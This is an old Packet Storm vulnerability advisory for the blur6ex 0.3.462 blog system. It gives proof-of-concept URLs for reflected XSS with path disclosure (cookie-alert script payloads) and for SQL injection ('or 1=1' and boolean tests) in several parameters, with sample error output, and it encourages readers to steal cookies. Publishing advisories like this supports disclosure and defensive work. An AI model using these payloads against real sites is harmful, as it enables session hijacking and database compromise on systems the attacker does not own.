what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

blur6ex.txt

blur6ex.txt
Posted Apr 12, 2006
Authored by crasher | Site kecoak.or.id

blur6ex version 0.3.462 suffers from multiple XSS and SQL injection vulnerabilities.

tags | advisory, vulnerability, sql injection
SHA-256 | 269b9d4ce6c51d4f848bfa6a7ad6474ba18894713698fc1e61f1c1e35117a4cb

blur6ex.txt

Change Mirror Download

k k kkkk k kkkk k k kkkkkk kkkkkk kkkk k k k k k
k k k k k k k k k kk k k k k kk k k k k
kk <><> kkkkk k kkkkk kk kk kkkkkk k k k k k k kk
k k k k k k k kk k k k k k k k k k k
k k kkkk k kkkk k k kk k k kkkk k kk k k k

-+| Multiple Vulnerabilities in blur6ex

Author : Rusydi Hasan M
a.k.a : cR45H3R
Date : April,10th 2006
Place : Indonesia, Cilacap

-+| Software description

blur6ex is a content management system for manage a blog.
Version : 0.3.462

-+| the bugs

1. I got XSS and full path disclosures in one step.
2. SQL injection

-+| Proof of Concept [PoC]

[0] XSS + Full path disclosures

http://[victim]/[blur6ex_dir]/index.php?shard=[XSS_here]
http://[victim]/[blur6ex_dir]/index.php?shard=login&action=g_error&errormsg=[XSS_here]

after you put XSS on the URL, the XSS will work and you also get the root
directory from the error message.

E[x]ample :

http://127.0.0.1/blur/index.php?shard=%3Ch1%3Ejust%20test%20your%20web%3C/h1%3E

Warning: main(): Failed opening 'engine/shards/<h1>just test your web</h1>.php'
for inclusion
(include_path='.:/usr/lib/php/:/usr/share/pear/') in
/var/www/html/blur/index.php on line 108

"just test your web" will show as <h1>

http://127.0.0.1/blur/index.php?shard=login&action=g_error&errormsg=%3Cscript%3Ealert(document.
cookie)%3C/script%3E
http://127.0.0.1/blur/index.php?shard=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://127.0.0.1/blur/index.php?shard=%3Cmarquee%3E --> seems good.try it :)

Now, go and steal the cookie but don't eat it :P.

[1] SQL injection

http://[victim]/[blur6ex_dir]/index.php?shard=blog&action=g_reply&ID=[SQL_here]
http://[victim]/[blur6ex_dir]/index.php?shard=blog&action=g_permaPost&ID=[SQL_here]
http://[victim]/[blur6ex_dir]/index.php?shard=content&action=g_viewContent&ID=[SQL_here]

You can see the database structure in
http://[victim]/[blur6ex_dir]/install/blur6ex_tables.sql
*if you were lucky :)*

E[x]ample :

http://127.0.0.1/blur/index.php?shard=blog&action=g_reply&ID='or%201=1/*

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server
version for the right syntax to use near '\'or 1=1/*' at line 1

http://127.0.0.1/blur/index.php?shard=blog&action=g_reply&ID=1%20and%201=0
http://127.0.0.1/blur/index.php?shard=blog&action=g_reply&ID=1%20and%201=1

-+| Vendor

I'm Still lazy [LOLZ]

-+| Shoutz

% fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,degleng,etc
% y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous, the
day
% ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,sakitjiwa,m_beben

-+| Contact

crasher@kecoak.or.id || http://kecoak.or.id



Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close